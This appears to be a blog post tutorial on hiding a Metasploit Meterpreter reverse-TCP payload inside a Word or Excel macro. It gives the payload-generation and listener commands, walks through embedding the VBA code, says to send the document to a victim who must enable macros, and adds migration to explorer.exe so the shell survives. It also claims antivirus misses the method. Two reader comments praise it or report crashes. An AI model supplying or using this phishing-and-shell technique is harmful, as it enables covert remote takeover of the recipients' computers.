Friday, October 18, 2013

Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

use payload/windows/meterpreter/reverse_tcp
set LPORT 443
generate -t vba

Now we have generated our shellcode. Now we will create macro.

(1)Open any word or Excell document

(2)Click on view & then click on Macros.

(3)Give name to macro & create macro.

(4)Remove all things from modules windows & Paste our generated VB code.

(5)Saved it as type Word Macro-Enabled Document.

Send this file to victim. By default in MS Office  " Disable all macros with notification " option is enabled , so whenever any document try to execute Macro it will pop up security warning that macro is disable ; so to execute our shellcode using macro victim should click on Enable content.

You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener

use exploit/multi/handler
set lhost
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe

Here we setup migrate script as autorunscript so when document will closed our shell will not die.


Unknown said...

Very nice tutorial on Macros and Kudos!!

Unknown said...

This macros normally run on Windows 7 x64 ultimate (Word 2010 Pro ), but crush same verison of MS Word on Windows 10Pro x64

Post a Comment